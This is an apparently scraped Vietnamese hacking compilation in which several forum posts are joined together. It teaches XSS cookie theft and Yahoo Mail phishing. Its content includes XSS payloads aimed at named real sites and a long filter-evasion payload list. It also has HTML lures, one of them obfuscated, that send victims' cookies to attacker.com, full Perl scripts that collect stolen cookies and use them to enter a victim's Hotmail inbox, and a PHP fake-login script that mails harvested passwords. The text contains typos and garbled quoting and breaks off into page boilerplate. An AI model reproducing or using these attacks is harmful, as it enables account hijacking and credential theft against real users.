để có thể áp dụng phương pháp này. Mặt khác các bạn cũng có thể hack được ngay cả đối với
các domain hosting chứ không phải là các site có dạng http://root/yoursite/ . Và Các Paid hosting
cũng không ngaọi trừ khả năng bị hack nếu các hacker đã thực sự muốn hack và sẵn sang bỏ
tiền mua một hosting trên cùng một Server. Phần hack paid hosting và domain tôi xin để cho các
bạn tự tìm hiểu. Hãy nhớ rằng luôn luôn phải chú ý đến URL Root của mỗi hosting. Ví dụ như ở
Cpanel thì URL Root cho các domain hosting l? http://[ip/ Server]/~user .vv
Chúc các bạn thành công
Bài viết của Lukos
Cross Site Scripting :
Ngày nay! các lỗ hổng Cross Site Scripting (XSS) ngày càng được phát hiện nhiều ở các dịch vụ
đại chúng nổi tiếng như: Yahoo, Hotmail, Ebay...
Cộng đồng các Hacker và Security đã chứng minh và có nhiều cuộc trình diễn về về sự nguy
hiểm của XSS bên trong các dịch vụ đại chúng nổi tiếng như: Yahoo, Hotmail, Ebay và một số
sản phẩm được ưa chuộng như: Apache, Tomcat, IIS, Lotus Domino. Các lỗ hổng XSS này cho
phép các Hacker có thể dễ dàng đánh cắp User của người dùng trên các ứng dụng Web.
Nhưng để thực hiện được một cuộc tấn công XSS thì đòi hỏi các Hacker phải có một khả năng
nhất định. Đầu tiên các Hacker sẽ cố gắng đánh cắp Cookies của người sử dụng vào đúng thời
điểm mà người sử dụng đó đăng nhập đến các dịch vụ ứng dụng Web.
Gần như tất cả các dịch vụ Web đại chúng đều sử dụng Cookies để liên kết các tài khoản với
người sử dụng. Điển hình là các dịch vụ Webmail như: Yahoo, Hotmail, Netscape...Và cả các
dịch vụ ngân hàng, thương mại điện tử cũng sử dụng Cookies cho mục đích chứng thực và cấp
phép.
Trong một kịch bản đăng nhập vào của các ứng dụng Web. Có 2 Token chứng thực được yêu
cầu trao đổi. Nó chính là Username và Password...2 giá trị này được lưu giữ bên trong Cookies,
sau đó được sử dụng như một dấu hiệu chứng thực duy nhất. Vậy để đánh cắp được User và
Password cuat nạn nhân. Thì trước hết bạn phải đánh cắp được Cookies của họ. Các Hacker
thường sử dụng và khai thác tính dễ tổn thương XSS để ăn cắp Cookies của người dùng trên
Internet.
Các Hacker cũng có thể gián tiếp sử dụng các kỹ thuật khác để thực hiện công việc này: chẳng
hạn như từ Cahe DNS, các Bug từ trình duyệt Internet của bạn, hay sử dụng một Trojan. Một khi
các Cookies được bị đánh cắp. Các Hacker có thể khai thác các thông tin quý giá lưu trên
Cookies và bắt đầu hướng các hoạt động đến các Server Web Application. Bắt đầu tấn công đến
tài khoản của nạn nhân. Nếu thàhh công các Hacker có thể toàn quyền sử dụng và điều khiển
các tài khoản ứng dụng trên Web của bạn.
Chúng ta bắt đầu tìm hiểu về các cuộc tấn công XSS:
Bản thân XSS là viết tắt của (Cross Site Scripting). Nếu một dịch vụ Web có chứa tính tổn
thương XSS nó cho phép các Hacker có thể gửi các dữ liệu hiểm độc tới nạn nhân hoặc xuyên

qua các ứng dụng đó. Các Hacker thường thực hiện khai thác tính dễ tổn thương XSS bằng kỹ
xảo sử dụng các URL hiểm độc hay lợi dụng sự sơ hở của nạn nhân để đánh lừa họ. Những
URL này rất đa dạng về ngôn ngữ: (VBScript, Javascript...etc) và chúng sẽ được Excute ngay
trên trình duyệt của nạn nhân.
Tính tổn thương XSS được xảy ra bởi một sự bất thường trong các ứng dụng Web khi xử lý các
giá trị đầu vào của người dùng. Dưới đây là một ví dụ về tính dễ tổn thương của XSS được khai
thác bằng cách nhúng JavaScript, nó sẽ được thực thi trên trình duyệt của nạn nhân cùng với sự
cho phép của dịch vụ Web dễ tổn thương:
http://www.microsoft.com/education/?ID=MCTN&target=http://www.microsoft.com/education/?ID=
MCTN&target="><script>alert(document.cookie)</script>
http://hotwired.lycos.com/webmonkey/00/18/index3a_page2.html?tw=<script>alert(„Test‟);</script
>
http://www.shopnbc.com/listing.asp?qu=<script>alert(document.cookie)</script>&frompage=4&p
age=1&ct=VVTV&mh=0&sh=0&RN=1
http://www.oracle.co.jp/mts_sem_owa/MTS_SEM/im_search_exe?search_text=%22%3E%3Cscri
pt%3Ealert%28document.cookie%29%3C%2Fscript%3E
Các dịch vụ Web phần lớn sử dụng ngôn ngữ CGI. Thật ra thì nạn nhân không cần thiết phải
Click vào một Link. Code XSS cũng có thể được tải tự động trong một E-mail dưới định dạng
HTML khi nạn nhân đọc Mail (thường là 2 Tag: IMG hay FRAME HTML - Badtrans Worm là một
ví dụ điển hình). Có rất nhiều cách để trèn mã JavaScript vào một URL cho mục đích khai thác
tính dễ tổn thương của XSS. Cross Site là một bộ phận của XSS sẽ tham chiếu tới những sự hạn
chế an toàn mà bộ trình duyệt mạng thông thường có liên quan đến dữ liệu với các Website
động (sử dụng DHTML). Bởi việc thực hiện các Script trên trình duyệt của nạn nhân cùng với sự
cho phép của ứng dụng Web đó. Các Hacker có thể vượt qua Document Object Model (DOM).
Lợi dụng sự sơ hở này các Hacker sẽ đánh cắp Cookies và đột nhập vào các tài khoản của bạn.
DOM là một Framework cho phép thực hiện những kịch bản để làm thay đổi nội dụng của những
trang Web động.
Như đã nói! các Hacker có thể lợi dụng tính dễ tổn thương của XSS để đánh cắp Cookies của
người sử dụng. Bởi việc trèn các Script hiểm độc, các Hacker có thể nắm quyền điều khiển bộ
trình duyệt cuar nạn nhân. Họ sẽ lợi dụng tính dễ tổn thương trong trình duyệt của nạn nhân để
dành quyền truy cập tới hệ điều hành của họ. Một đoạn Code ví dụ:
<a href="javascript#[code]">
<div onmouseover="[code]">
<img src="java script:[code]">
<img dynsrc="java script:[code]">
<input type="image" dynsrc="java script:[code]">
<bgsound src="java script:[code]">
&<script>[code]</script>
&{[code]};
<img src=&{[code]};>
<link rel="stylesheet" href="java script:[code]">
<iframe src="vbscript :[code]">
<img src="mocha:[code]">
<img src="livescript:[code]">

<a href="about :<script>[code]</script>">
<meta http-equiv="refresh" content="0;url=java script:[code]">
<body onload="[code]">
<div style="background-image: url(java script:[code]);">
<div style="behaviour: url([link to code]);">
<div style="binding: url([link to code]);">
<div style="width: expression([code]);">
<style type="text/javascript">[code]</style>
<object classid="clsid:..." codebase="java script:[code]">
<style></script>
<![CDATA[</script>
<script>[code]</script>
<<script>[code]</script>
<img src="blah"onmouseover="[code]">
<img src="blah>" onmouseover="[code]">
<xml src="java script:[code]">
<xml id="X"><a><b><script>[code]</script>;</b></a></xml>
<div datafld="b" dataformatas="html" datasrc="#X"></div>
[xC0][xBC]script>[code][xC0][xBC]/script>
Bạn có thể tham khảo thêm thông tin ở:
http://www.cgisecurity.com/articles/xss-faq.shtml
http://www.w3.org/DOM/
A Tradition XSS Power Hjack
Để thực hiện một phiên đánh cướp (Hjack) các Hacker thường sự dụng bộ chụp gói tin (Sniffer),
các công cụ bẻ khoá (Brute Force)...Thông dụng và phù hợp hơn cả vẫn là cách đánh cắp
Cookies để nắm quyền điều khiển một phiên ứng dụng mạng của một người dùng hợp pháp
trong khi người dùng đăng nhập vào hệ thống mạng ứng dụng. Thông thường thì kẻ tấn công
thường thực hiện tất cả các chức năng ứng dụng của mạng với cùng đặc quyền của người sử
dụng hợp pháp đó. Dưới đây là các bước được Hacker sử dụng để đánh cắp Cookies của người
sử dụng hợp pháp
- Một người sử dụng đăng nhập vào hệ thống ứng dụng Web của họ, một phiên làm việc đã
được thiết lập. Các Hacker biết về tính dễ tổn thương của hệ thống ứng dụng Web đó.
- Hacker sẽ gửi các mã XSS hiểm độc đến nạn nhân thông qua E-mail dưới định dạng HTML hay
qua một trang Web trung gian. Trong một vài trường hợp các Hacker có thể nhúng chúng vào
các nội dung Web phổ biến như Guest Book, Form Mail...các mã hiểm độc này sẽ được tự động
thực thi trên trình duyệt của nạn nhân mà không cần sự cho phép của họ. Lấy ví dụ: tính dễ tổn
thương trong http://hotwried.lycos.com Có đoạn Code sau:
<html>
<head>
<title>Look at this!</title>
</head>
<body>
<a
href="http://hotwired.lycos.com/webmonkey/00/18/index3a_page2.html?tw=<
script>document.location.replace('http://attacker.com/steal.cgi?'+docum
ent.cookie);</script>"> Check this CNN story out! </a>

</body>
</html>
Đoạn Script trên sẽ dẫn nạn nhân đến một trang có chứa CGI Script của kẻ tấn công và tại đây
nó sẽ đánh cắp Cookies của nạn nhân. Nó sẽ có dạng như sau:
http://attacker.com/steal.cgi?lubid=010000508BD3046103F43B8264530098C20
100000000;%20p_uniqid=8sJgk9daas7WUMxV0B;%20gv_tit
an_20=5901=1019511286
Hay các Hacker cũng có thể đanh lừa nạn nhân bằng đoạn Code sau:
<html>
<head>
</head>
<body>
<a
script>document.location.replace('http://attacker.com/steal.cgi?'+docum
ent.cookie);</script>"
onMouseOver="window.status='http://www.cnn.com/2002/SHOWBIZ/News/05/02/
clinton.talkshow.reut/index.html';return true"
onMouseOut="window.status='';return true"> Check this CNN story out!
</a>
</body>
</html>
Tuy nhiên nếu để đoạn Code đó lộ thiên như vậy sẽ rất khó lừa nạn nhân cũng như cơ chế lọc
của các dịch vụ ứng dụng Web. Chính vì vậy lên các Hacker thường mã hoá chúng lại theo
chuẩn ASCII (American Standar Code Information Interchance):
<html>
<head>
</head>
<body>
<a
script>var u = String.fromCharCode(0x0068);u %2B=
String.fromCharCode(0x0074);u %2B= String.fromCharCode(0x0074);
u %2B= String.fromCharCode(0x0070);u %2B= String.fromCharCode(0x003A);
u %2B= String.fromCharCode(0x002F);u %2B= String.fromCharCode(0x002F);
u %2B= String.fromCharCode(0x0061);u %2B= String.fromCharCode(0x0074);
u %2B= String.fromCharCode(0x0063);u %2B= String.fromCharCode(0x006B);
u %2B= String.fromCharCode(0x002E);u %2B= String.fromCharCode(0x0063);
u %2B= String.fromCharCode(0x006F);u %2B= String.fromCharCode(0x006D);
u %2B= String.fromCharCode(0x002F);u %2B= String.fromCharCode(0x0073);

u %2B= String.fromCharCode(0x0061);u %2B= String.fromCharCode(0x006C);
u %2B= String.fromCharCode(0x002E);u %2B= String.fromCharCode(0x0063);
u %2B= String.fromCharCode(0x003F);u %2B=
document.cookie;document.location.replace(u);</script>"
onMouseOver="window.status='http://www.cnn.com/2002/SHOWBIZ/News/05/02/
clinton.talkshow.reut/index.html';return true"
onMouseOut="window.status='';return true"> Check this CNN story out!
</a>
</body>
</html>
- Khi các đoạn Script này được thực hiện trên trình duyệt của người dùng hay được tự động thực
thi trên trong E-mail của nạn nhân. Nó sẽ tự động Load các Tag như IMG, HTML FRAME (img
src ="script.js"> hay <iframe = "script.js">. Khi đoạn Code Java Script đó được thực hiện (có thể
sử dụng các ngôn ngữ khác) thì nó sẽ bị trang Web chứa Code CGI của Hacker đánh cắp.
Cookies sẽ có dạng như sau:
http://attacker.com/steal.cgi? lubid=01000000F81038F953EB3C41EB340000585500000000
;%20p
_uniqid=8s51F99ZdNn/n27HtA
Giá trị Cookies ở đây chính là: lubid=01000000F81038F953EB3C41EB340000585500000000
;%20p
_uniqid=8s51F99ZdNn/n27HtA
- Các Hacker thương sử dụng một số đoạn Code để đánh cắp Cookies của nạn nhân và sử dụng
giá trị Cookies đó ngay trên trình duyệt của mình. Đoạn Code Perl sau sẽ giúp các Hacker thực
hiện điều đó:
#!/usr/bin/perl
# steal.cgi by David Endler dendler@idefense.com
# Specific to your system
$mailprog = '/usr/sbin/sendmail';
# create a log file of cookies, we‟ll also email them too
open(COOKIES,”>>stolen_cookie_file”);
# what the victim sees, customize as needed
print "Content-type:text/htmlnn";
print <<EndOfHTML;
<html><head><title>Cookie Stealing</title></head>
<body>
Your Cookie has been stolen. Thank you.
</body></html>
EndOfHTML
# The QUERY_STRING environment variable should be filled with
# the cookie text after steal.cgi:
# http://www.attacker.com/steal.cgi?XXXXX
print COOKIES “$ENV{'QUERY_STRING'} from $ENV{„REMOTE_ADDR‟}n”;
# now email the alert as well so we can start to hijack
open(MAIL,"|$mailprog -t");
print MAIL "To: attacker@attacker.comn";
print MAIL "From: cookie_steal@attacker.comn";
print MAIL "Subject: Stolen Cookie Submissionnn";

print MAIL "-" x 75 . "nn";
print MAIL “$ENV{'QUERY_STRING'} from $ENV{„REMOTE_ADDR‟}n”;
close (MAIL);
Hacker chỉ cần đọc Mail và lấy giá trị Cookies vừa ăn cắp được của nạn nhân và đăng nhập vào
hệ thống ứng dụng Web với giá trị Cookies đó mà không cần User và Pass. Tất nhiên anh ta có
toàn quyền sử dụng tài khoản này.
Now Let's Automated it
Một trong những trở ngại lớn nhất trong quá trình đánh cắp Cookies của các Hacker có lẽ là sự
tính toán về yếu tố thời gian. Bởi vì ngoài việc phải phục kích đúng thời điểm nạn nhân đăng
nhập. Các Hacker còn phải liên tục theo dõi các E-mail và những CGI log trong khi thực hiện
công việc đánh cắp Cookies, và tiến hành đánh cắp phiên làm việc trước khi nạn nhân thoát ra
khỏi phiên làm việc đó. Chính vì vậy mà các Hacker đã nghĩ đến làm sao phải tự động hoá cái
quá trình tốn kém công sức và thời gian này.
Chúng ta hãy cùng xem xét qua Hotmail. Một dịch vụ Freemail nổi tiếng của hãng MSN. Đầu tiên
kẻ tấn công cũng đánh lừa nạn nhân Click vào một liên kết để đánh cắp Cookies của họ, hoặc
thậm chí các Hacker còn sử dụng cả các Worm.
Lấy ví dụ một đoạn Cookies của Hotmail có dạng sau:
HMP1=1;
HMSC0899=223victim%40hotmail%2ecomSxAIWq5iIf2ZTc6e
TZYkHUqtZeCuYMKoBAB1eiapyad
Kb1RCjuNz5U4%21l1KIOsuBpTEbUKYkmTuzPJVj%2abtLeMyiV
Gap9BF82YvrP2WPsX4Z6ekH9a7c
Rqq2VqTspQIS33GWygbPEsLOEFIupoiaYZdqmURMJK%21nh6O4
u4UNAJUjzOmQ8ye%2at3GjQfi6p
Ba3vTT533tCRmZDy47NZY6cPdkbeHR5soAVnNPyqhvm73a%214
%2aFRHPJfOGhT6cbVR9zN%21XDX
3seXv9czjX6cm2lugTnpKZS2UQ0j%21%21PWkyiqS2aSw%2aKk
2%2aCquxzpjE2F0uVZgHfznNjVL
PgGV2H%2a5GqZjXf144U0m8HFwlGS9A8RIwNMGtMoSro%2atCU
6L6304VyZyJ4vlEM%21adk%24;
MC1=V=3&GUID=0724b14826c9437ct786ba6f2a36b04f;
lang=en-us;
mh=MSFT;
SITESERVER=ID=UID=0724b14876c9437ca786ba6f2a36b44f
;
MSPAuth=2JqD6vvUbDzqFAm6O7QVMWaeSdtiJExWGRQ5cmSuJ9
CUf4QSJbsQNmKkOCe3RLo%21A5G
hxQ7mtfdZ%2aw3Bc0O7Pwzw%24%24;
MSPProf=2JqD6vvUbB11hog4j6OgbT%21BYwgn3IZN9AyKYUpD
NECCi%2a9dBZf37wqxmWtyS%21%
21Z6icYG8dVF30FnbsANQcdN1lQ%21QJCTDiddJAW9oiWSf%2a
8g9nwIGclDtNP6Hk2gFlOfZHEju

vkM6Ja1N549eYs1VuhdcHCFWukzbVR%21%218POKn%2aS8vcqV
g4ZHHgabh0CQXoxj;
domain=lw4fd.law4.hotmail.msn.com;
Và nó sẽ được gửi đến Script CGI của Hacker với nội dung sau:
http://attacker.com/steal2.cgi?HMP1=1;%20HMSC0899=223victim%40hotmail%2ecomSx
AIWq5iIf2ZTc6eTZYkHUqtZeCuYMKoBAB1eiapyadKb1RCjuNz
5U4%21l1KIOsuBpTEbUKYkmTuzP
JVj%2abtLeMyiVGap9BF82YvrP2WPsX4Z6ekH9a7cRqq2VqTsp
QIS33GWygbPEsLOEFIupoiaYZdq
mURMJK%21nh6O4u4UNAJUjzOmQ8ye%2at3GjQfi6pBa3vTT533
tCRmZDy47NZY6cPdkbeHR5soAVn
NPyqhvm73a%214%2aFRHPJfOGhT6cbVR9zN%21XDX3seXv9czj
X6cm2lugTnpKZS2UQ0j%21%21PW
kyiqS2aSw%2aKk2%2aCquxzpjE2F0uVZgHfznNjVLPgGV2H%2a
5GqZjXf144U0m8HFwlGS9A8RIwN
MGtMoSro%2atCU6L6304VyZyJ4vlEM%21adk%24;%20MC1=V=3
&GUID=0724b14826c9437ct786b
a6f2a36b04f;%20lang=en_s;%20mh=MSFT;%20SITESERVER=
ID=UID=0724b14876c9437ca786
ba6f2a36b44f;%20MSPAuth=2JqD6vvUbDzqFAm6O7QVMWaeSd
tiJExWGRQ5cmSuJ9CUf4QSJbsQN
mKkOCe3RLo%21A5GhxQ7mtfdZ%2aw3Bc0O7Pwzw%24%24;%20M
SPProf=2JqD6vvUbB11hog4j6Og
bT%21BYwgn3IZN9AyKYUpDNECCi%2a9dBZf37wqxmWtyS%21%1
Z6icYG8dVF30FnbsANQcdN1lQ%
21QJCTDiddJAW9oiWSf%2a8g9nwIGclDtNP6Hk2gFlOfZHEjuv
kM6Ja1N549eYs1VuhdcHCFWukzb
VR%21%218POKn%2aS8vcqVg4ZHHgabh0CQXoxj;%20domain=l
w4fd.law4.hotmail.msn.com;
Dưới đây là đoạn Code CGI được sử dụng để đánh cắp CGI của Hotmail:
#!/usr/bin/perl
# steal2.cgi by David Endler dendler@idefense.com
use LWP::UserAgent;
use HTTP::Cookies;
$cookie = HTTP::Cookies->new (
File => $cookiefile,
AutoSave => 0, );
# Specific to your system
$mailprog = '/usr/sbin/sendmail';
# create a log file of cookies, we‟ll also email them too
open(COOKIES,”>>stolen_cookie_file”);
# what the victim sees, customize as needed
print "Content-type:text/htmlnn";
print <<EndOfHTML;
<html><head><title>Cookie Stealing</title></head>

<body>
Your Cookie has been stolen. Thank you.
</body></html>
EndOfHTML
# The QUERY_STRING environment variable should be
# filled with
# the cookie text after steal2.cgi:
# http://www.attacker.com/steal2.cgi?XXXXX
print COOKIES “$ENV{'QUERY_STRING'} from $ENV{„REMOTE_ADDR‟}n”;
# now email the alert as well so we can start to hijack
open(MAIL,"|$mailprog -t");
print MAIL "To: attacker@attacker.comn";
print MAIL "From: cookie_steal@attacker.comn";
print MAIL "Subject: Stolen Cookie Submissionnn";
print MAIL "-" x 75 . "nn";
print MAIL “$ENV{'QUERY_STRING'} from $ENV{„REMOTE_ADDR‟}n”;
close (MAIL);
# this snippet goes to the victim‟s Hotmail inbox and dumps
# the output. An attacker could just as easily add some lines
# to parse for http://lw4fd.law4.hotmail.msn.com/cgi-bin/getmsg?
# and then read the individual emails
$base_url = “http://lw4fd.law4.hotmail.msn.com/cgi-bin/HoTMaiL?”;
$ua->agent("Mozilla/4.75 [en] (Windows NT 5.0; U)");
$request = new HTTP::Request ('GET', $base_url);
$ua->cookie_jar( $cookie );
# let‟s do a little parsing of our input to separate multiple
# cookies
# cookies are seperated by a semicolon and
# a space (%20),
# this will extract them so we can load them into our
# HTTP agent
@cookies = split(/;%20/,$ENV{'HTTP_COOKIE'});
for (@cookies){
@cookie_pairs = split(/=/, $_);
$cookie->set_cookie(0, “$cookie_pairs[0]” => “$cookie_pairs[1]”, "/",
".hotmail.com");
$cookie->add_cookie_header($request); }
# now that our forged credentials are loaded, let‟s
# access the victim‟s Hotmail account! At this point
# we can do anything to their account simply by forming the
# correct URL
$response = $ua->simple_request( $request );
$contents = $response->content;
print COOKIES “$contentsn”;
Như đã nói ở trên để thực hiện một cuộc tấn công XSS không phải là dễ. Nhưng bạn cũng lên
thận trọng trước các cuộc tấn công kiểu này...
Bài viết của Binhnx2000

#######################################################################
Author by : CUCCU ( Members of HVA )
Website : http:// www.vnhacker.org/forum/
Edit by : PTV5 Group
Website : http://www.ptv5online.com ; http://www.ptv5online.net ……
#######################################################################
Lời mở đầu:
Trước tiên xin nói trước là bài viết này là của tôi tự nghiên cứu và viết, bất cứ bài viết
nào post lại mà không ghi tên tôi là tui "ca cải lương" cho tắt luôn đấy
Thứ hai là xin phép các bác admin và mod cho bài này tồn tại, đừng cho vào sọt nhé
*******************************
Bài viết của tôi có 4 bước:
*******************************
Bước 1. Tạo Fake login: Muốn lấy được pass của victim với tỉ lệ thành công cao,
bạn phải có một trang Web dỏm y hệt như của Yahoo! Mail
Thuổng của người khác:
QUOTE
Tạo tệp yahoo.PHP, đoạn code như sau:
<?
$contactemail = "mailcuaban@yahoo.com"; //
$subject = "password of $login@yahoo.com : $passwd";
$message = "";
mail($contactemail, $subject, $message);
header("location: http://login.yahoo.com/config/login?6rfn98...&.src=ym&.last=
&promo=&.intltype=us&.bypass=&.partner=&.u=6l335nstlpk8v&.v=0&hasMsgr=
0&.chkP=Y&.done=&login=$login&passwd=$passwd&.persistent=");
?>
Save as trang chính của yahoo! mail, sau đó mở tệp này bằng Notepate và tìm đến
dòng:
<FORM name=login_form onsubmit="return
hash(this,'http://login.yahoo.com/config/login')"
action=http://login.yahoo.com/config/login method=post autocomplete="off">
Thay đoạn này bằng :
<FORM action="http://trang Web có hỗ trợ php/tên đăng kí của bạn/yahoo.php"
method="post">
Cái này thì cực nhiều hướng dẫn trên diễn đàn rồi, nhưng có một số lỗi sau khiến
hiệu quả không được cao:

Ky thuat hack

Recommended

Recommended

More Related Content

What's hot

What's hot (20)

Similar to Ky thuat hack

Similar to Ky thuat hack (20)

Recently uploaded

Recently uploaded (10)

Ky thuat hack